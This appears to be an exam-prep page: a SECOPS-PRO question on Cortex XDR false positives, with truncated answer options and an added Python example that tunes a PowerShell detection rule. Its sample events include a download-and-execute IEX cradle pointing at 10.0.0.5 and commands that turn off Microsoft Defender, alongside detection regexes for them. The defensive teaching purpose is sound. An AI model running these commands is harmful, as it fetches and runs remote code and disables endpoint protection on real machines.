Palo Alto Networks SECOPS-PRO Question #79: Real Exam Question with Answer & Explanation


Question

A SOC uses Palo Alto Networks Cortex XDR for endpoint detection and response. A new custom behavioral threat detection rule is implemented to identify suspicious PowerShell activity, specifically focusing on encoded commands and attempts to disable security features. Days after deployment, the SOC is inundated with alerts, most of which are traced back to legitimate IT administration scripts or software installers. This flood of alerts significantly impacts the team's ability to respond to actual threats. Which of the following statements accurately describes this situation and the most effective strategic adjustment?

Options

  • A. This is a True Negative scenario; the rule is working as intended. The SOC needs to hire more
  • B. This represents a False Negative; the rule is failing to catch true threats. The rule needs to be
  • C. This is a False Positive epidemic. The strategic adjustment should involve refining the custom
  • D. This is a True Positive overload; genuine threats are being detected. The solution is to automate
  • E. This is an example of an 'undetected' event. The rule should be immediately disabled until it can
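The detection and tuning problem in the question stem, as an added example that is not part of the exam page and is not Cortex XDR's BIOC/XQL rule syntax: a first-cut rule that fires on the mere presence of an encoded PowerShell command or on a loose list of "disable security" strings, beside a tuned version that decodes the payload, alerts on behaviour that is high-risk regardless of who launched it, and suppresses only benign encoded commands from an assumed allowlisted deployment agent. The process events, the patterns and the allowlist entry (ccmexec.exe) are constructed for illustration; both rules are scored against labelled events so the false-positive reduction is measurable.

```python
"""Behavioural PowerShell detection rule, before and after tuning.

Added example for the scenario above; not Cortex XDR's rule syntax and not
code from the exam page. Events, patterns and allowlist are constructed.
"""
import base64
import binascii
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record (constructed, not real telemetry)."""
    parent: str
    cmdline: str
    malicious: bool  # ground-truth label, used only for scoring


def _b64_utf16(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# powershell.exe accepts abbreviated parameter names, so match -e, -ec, -enc and -EncodedCommand.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})")


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or "" if absent or undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return ""


# Rule v1: the rule as first deployed. It fires on any encoded command and its
# "disable security" list includes -ExecutionPolicy Bypass, which is not a
# security boundary and is routine in installers and admin scripts.
NAIVE_DISABLE = re.compile(
    r"(?i)Set-MpPreference|Stop-Service\s+WinDefend|advfirewall\s+set\s+\w+\s+state\s+off|"
    r"-ExecutionPolicy\s+Bypass"
)


def rule_v1(ev: ProcessEvent) -> bool:
    return bool(ENCODED_FLAG.search(ev.cmdline) or NAIVE_DISABLE.search(ev.cmdline))


# Rule v2: tuned. Decode the payload and look for behaviour that is high-risk in
# any context; for encoded commands that are not themselves high-risk, suppress
# only when the parent is the assumed allowlisted deployment agent.
HIGH_RISK = re.compile(
    r"(?i)Set-MpPreference\s+-Disable\w+|Stop-Service\s+WinDefend|"
    r"advfirewall\s+set\s+\w+\s+state\s+off|"
    r"(?:DownloadString|DownloadFile|Invoke-Expression|\bIEX\b)"
)
ALLOWLISTED_PARENTS = {"ccmexec.exe"}  # assumption: the org's software deployment agent


def rule_v2(ev: ProcessEvent) -> bool:
    decoded = decode_encoded_command(ev.cmdline)
    if HIGH_RISK.search(ev.cmdline + "\n" + decoded):
        return True  # high-risk behaviour is never suppressed by the allowlist
    if decoded and ev.parent.lower() not in ALLOWLISTED_PARENTS:
        return True  # encoded command from a parent we do not expect to use one
    return False


def score(rule, events) -> dict:
    """Count true/false positives and false negatives for a rule over labelled events."""
    hits = [(rule(e), e.malicious) for e in events]
    tp = sum(1 for h, m in hits if h and m)
    fp = sum(1 for h, m in hits if h and not m)
    fn = sum(1 for h, m in hits if not h and m)
    precision = tp / (tp + fp) if tp + fp else 0.0
    return {"tp": tp, "fp": fp, "fn": fn, "precision": round(precision, 2)}


# Constructed sample events: two obvious attacks, three legitimate admin/installer
# actions that drown rule v1 in alerts, one attack launched under the allowlisted
# parent, and one ordinary benign command.
EVENTS = [
    ProcessEvent("winword.exe", "powershell.exe -nop -w hidden -enc " + _b64_utf16(
        "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')"), True),
    ProcessEvent("cmd.exe", 'powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true"', True),
    ProcessEvent("ccmexec.exe", "powershell.exe -EncodedCommand " + _b64_utf16(
        "Get-Service BITS | Restart-Service"), False),
    ProcessEvent("msiexec.exe", r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\Installer\setup.ps1", False),
    ProcessEvent("ccmexec.exe", "powershell.exe -ec " + _b64_utf16("Get-CimInstance Win32_OperatingSystem"), False),
    ProcessEvent("ccmexec.exe", "powershell.exe -enc " + _b64_utf16(
        "Set-MpPreference -DisableRealtimeMonitoring $true; Stop-Service WinDefend"), True),
    ProcessEvent("explorer.exe", "powershell.exe -Command Get-Process", False),
]

if __name__ == "__main__":
    print("rule v1:", score(rule_v1, EVENTS))
    print("rule v2:", score(rule_v2, EVENTS))
```

Scoring both rules over the same labelled events shows the shape of the fix: v1 catches every attack but also fires on every deployment-agent script and installer, so half its alerts are false positives; v2 keeps every true positive and drops the false positives. The caveat is in how the allowlist is scoped: it only suppresses the "encoded but otherwise benign" branch, so a payload that disables Defender still alerts even when launched under ccmexec.exe. Allowlisting a parent process outright would turn the sixth event into a false negative.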
